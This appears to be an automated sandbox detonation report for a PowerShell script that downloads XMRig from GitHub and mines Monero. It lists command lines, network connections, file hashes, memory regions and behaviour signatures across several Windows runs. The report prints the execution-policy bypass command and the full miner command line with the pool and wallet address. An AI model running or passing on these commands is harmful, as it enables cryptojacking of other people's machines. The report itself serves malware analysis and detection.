C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.227.11:443 tcp

Files

memory/2568-0-0x00007FFDFF433000-0x00007FFDFF435000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vu5d1djc.mgb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2568-9-0x0000026B3AFD0000-0x0000026B3AFF2000-memory.dmp

memory/2568-10-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp

memory/2568-11-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp

memory/2568-12-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp

memory/2568-14-0x0000026B3B030000-0x0000026B3B042000-memory.dmp

memory/2568-15-0x0000026B3B020000-0x0000026B3B02A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3816-46-0x0000021416FF0000-0x0000021417010000-memory.dmp

memory/3816-47-0x0000021417050000-0x0000021417070000-memory.dmp

memory/3816-48-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/2568-49-0x00007FFDFF433000-0x00007FFDFF435000-memory.dmp

memory/2568-50-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp

memory/3816-53-0x0000021417070000-0x0000021417090000-memory.dmp

memory/2568-52-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp

memory/3816-51-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-54-0x0000021417090000-0x00000214170B0000-memory.dmp

memory/3816-55-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-56-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-57-0x0000021417070000-0x0000021417090000-memory.dmp

memory/3816-58-0x0000021417090000-0x00000214170B0000-memory.dmp

memory/3816-59-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-60-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-61-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-62-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-63-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-64-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-65-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-66-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-67-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-68-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-69-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-70-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-71-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-72-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-73-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-74-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-75-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-76-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-77-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-78-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-79-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-80-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-81-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-82-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-83-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-84-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-85-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-86-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-87-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-88-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-89-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-90-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-91-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-92-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-93-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-94-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-95-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-96-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-97-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-98-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-99-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-100-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-101-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-102-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-103-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-104-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-105-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-106-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-107-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-108-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-109-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-110-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-111-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-112-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-113-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-114-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-115-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-116-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-117-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:26

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1775s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
NL 23.62.61.104:443 www.bing.com tcp
US 8.8.8.8:53 104.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp

Files

memory/4548-0-0x00007FF89DDC3000-0x00007FF89DDC5000-memory.dmp

memory/4548-6-0x0000023A8EA90000-0x0000023A8EAB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_savfhfya.udc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4548-11-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/4548-12-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/4548-14-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/4548-15-0x0000023AA7900000-0x0000023AA7912000-memory.dmp

memory/4548-16-0x0000023A8E8F0000-0x0000023A8E8FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3252-47-0x0000021399990000-0x00000213999B0000-memory.dmp

memory/3252-48-0x00000213999D0000-0x00000213999F0000-memory.dmp

memory/3252-49-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-51-0x00000213999F0000-0x0000021399A10000-memory.dmp

memory/4548-50-0x00007FF89DDC3000-0x00007FF89DDC5000-memory.dmp

memory/4548-52-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/3252-54-0x0000021399A10000-0x0000021399A30000-memory.dmp

memory/3252-53-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/4548-55-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/3252-56-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-58-0x00000213999F0000-0x0000021399A10000-memory.dmp

memory/3252-57-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-59-0x0000021399A10000-0x0000021399A30000-memory.dmp

memory/3252-60-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-61-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-62-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-63-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-64-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-65-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-66-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-67-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-68-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-69-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-70-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-71-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-72-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-73-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-74-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-75-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-76-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-77-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-78-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-79-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-80-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-81-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-82-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-83-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-84-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-85-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-86-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-87-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-88-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-89-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-90-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-91-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-92-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-93-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-94-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-95-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-96-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-97-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-98-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-99-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-100-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-101-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-102-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-103-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-104-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-105-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-106-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-107-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-108-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-109-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-110-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-111-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-112-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-113-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-114-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-115-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-116-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-117-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

memory/3252-118-0x00007FF6AE700000-0x00007FF6AF333000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:26

Platform

win11-20240419-en

Max time kernel

1799s

Max time network

1788s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/2736-0-0x00007FFA7DA33000-0x00007FFA7DA35000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hzlybflj.izs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2736-9-0x000001DA46EC0000-0x000001DA46EE2000-memory.dmp

memory/2736-10-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp

memory/2736-11-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp

memory/2736-12-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp

memory/2736-14-0x000001DA46F40000-0x000001DA46F52000-memory.dmp

memory/2736-15-0x000001DA46F30000-0x000001DA46F3A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3936-46-0x000002C575BE0000-0x000002C575C00000-memory.dmp

memory/3936-47-0x000002C577520000-0x000002C577540000-memory.dmp

memory/3936-48-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-51-0x000002C577560000-0x000002C577580000-memory.dmp

memory/3936-50-0x000002C577540000-0x000002C577560000-memory.dmp

memory/2736-49-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp

memory/2736-53-0x00007FFA7DA33000-0x00007FFA7DA35000-memory.dmp

memory/3936-52-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-54-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-57-0x000002C577560000-0x000002C577580000-memory.dmp

memory/3936-56-0x000002C577540000-0x000002C577560000-memory.dmp

memory/3936-55-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-58-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-59-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-60-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-61-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-62-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-63-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-64-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-65-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-66-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-67-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-68-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-69-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-70-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-71-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-72-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-73-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-74-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-75-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-76-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-77-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-78-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-79-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-80-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-81-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-82-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-83-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-84-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-85-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-86-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-87-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-88-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-89-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-90-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-91-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

memory/3936-92-0x00007FF667C80000-0x00007FF6688B3000-memory.dmp

